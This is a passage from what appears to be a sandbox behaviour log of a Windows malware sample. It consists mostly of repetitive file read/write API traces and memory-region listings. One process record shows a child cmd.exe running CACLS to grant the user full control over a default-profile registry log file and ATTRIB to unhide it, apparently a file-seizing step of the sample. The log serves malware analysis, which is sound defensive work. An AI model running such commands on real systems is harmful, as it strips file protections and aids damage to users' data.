nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.718] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 
0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.719] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.719] GetFileType (hFile=0x4c) returned 0x1 [0215.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) 
returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.720] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.720] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.720] GetFileType (hFile=0x4c) returned 0x1 [0215.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] GetFileType (hFile=0x4c) returned 0x1 [0215.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.721] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.722] ReadFile 
(in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] GetFileType (hFile=0x4c) returned 0x1 [0215.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.722] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.723] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x200, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, 
lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18edc0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, 
lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.723] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x32, lpOverlapped=0x0) returned 1 [0215.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.724] GetFileType (hFile=0x4c) returned 0x1 [0215.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.724] GetFileType (hFile=0x4c) returned 0x1 [0215.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.724] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x32, lpOverlapped=0x0) returned 1 [0215.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.724] _close (_FileHandle=4) returned 0 [0215.724] FindNextFileW (in: hFindFile=0x1f0e30, lpFindFileData=0x18efd4 | out: lpFindFileData=0x18efd4) returned 0 [0215.724] GetLastError () returned 0x12 [0215.724] FindClose (in: hFindFile=0x1f0e30 | out: hFindFile=0x1f0e30) returned 1 [0215.725] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0215.810] _close (_FileHandle=3) 
returned 0 [0215.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.810] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.810] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.810] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.811] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.811] SetConsoleInputExeNameW () returned 0x1 [0215.811] GetConsoleOutputCP () returned 0x1b5 [0215.811] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.811] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.811] exit (_Code=0) Process: id = "542" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31868 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31869 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31870 start_va = 0x40000 end_va = 0x40fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31871 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31872 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31873 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31874 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31875 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31876 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 31877 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31974 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31975 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31976 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31977 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 31978 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 31979 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31980 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31981 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31982 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31983 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31984 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31985 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31986 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" 
(normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31987 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31988 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 31989 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31990 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31991 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31992 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31993 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31994 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31995 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 31996 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 31997 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 32046 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = 
